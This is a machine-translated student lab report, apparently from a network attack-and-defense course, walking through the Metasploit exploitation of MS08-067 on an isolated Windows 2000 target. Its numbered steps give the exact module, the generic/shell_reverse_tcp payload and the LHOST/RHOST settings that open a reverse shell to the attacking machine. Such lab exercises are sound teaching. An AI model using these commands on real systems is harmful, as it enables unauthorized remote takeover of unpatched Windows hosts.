2017-2018-2 20179205 "Network Attack and Defense Technology and Practice" Windows Attack Experiment

Others 2022-04-21 09:48:24 views: 0

Windows Attack Experiment

Experiment description:

Use Metaspoit to attack MS08-067, and submit screenshots (no less than five) of the process of getting the remote shell correctly.

MS08-067 Vulnerability Introduction

  The MS08-067 vulnerability, known as the Windows Server Service RPC Request Buffer Overflow Vulnerability, could allow remote code execution if a user receives a specially crafted RPC request on an affected system. On Microsoft Windows 2000, Windows XP and Windows Server 2003 systems, an attacker could exploit this vulnerability to run arbitrary code without authentication. This vulnerability can be used for worm attacks, and there are already worms that exploit this vulnerability.

experimental tool

The attack aircraft used in this experiment is kali, and the target aircraft is Win2kServer

攻击机:192.168.92.147
靶机:192.168.92.148

Experimental steps:

1. First, the attack aircraft and the target aircraft ping each other, and open msfconsole in the kali terminal

2. Check whether there is a ms08_067 vulnerability, check the returned information, and the found penetration module will be displayed

3. Enter the command use exploit/windows/smb/ms08_067_netapi to enter the exploit module. Then you can enter some commands to display some information, such as:

输入show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp

使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷

输入show targets会显示出可以被攻击的靶机的操作系统型号

4. Enter show options to display the data we need to set before attacking

5. Set the address of the attack aircraft and target aircraft, and use the command show options to view the payload status again

输入命令set LHOST + 攻击机IP,即set LHOST 192.168.92.147;
输入命令set RHOST + 靶机IP,即set RHOST 192.168.92.148;

6. Enter the command exploit to start the attack, the following picture shows the successful result of the normal attack

7. Check the IP addresses of the attacking machine and the target machine respectively, enter ipconfig/all, and find that the results are the same

8. Enter the "netstat -a" command to see which ports are opened by the target machine

9. Enter the "netstat -n" command to view the network connection of the target port

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=324548430&siteId=291194637
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com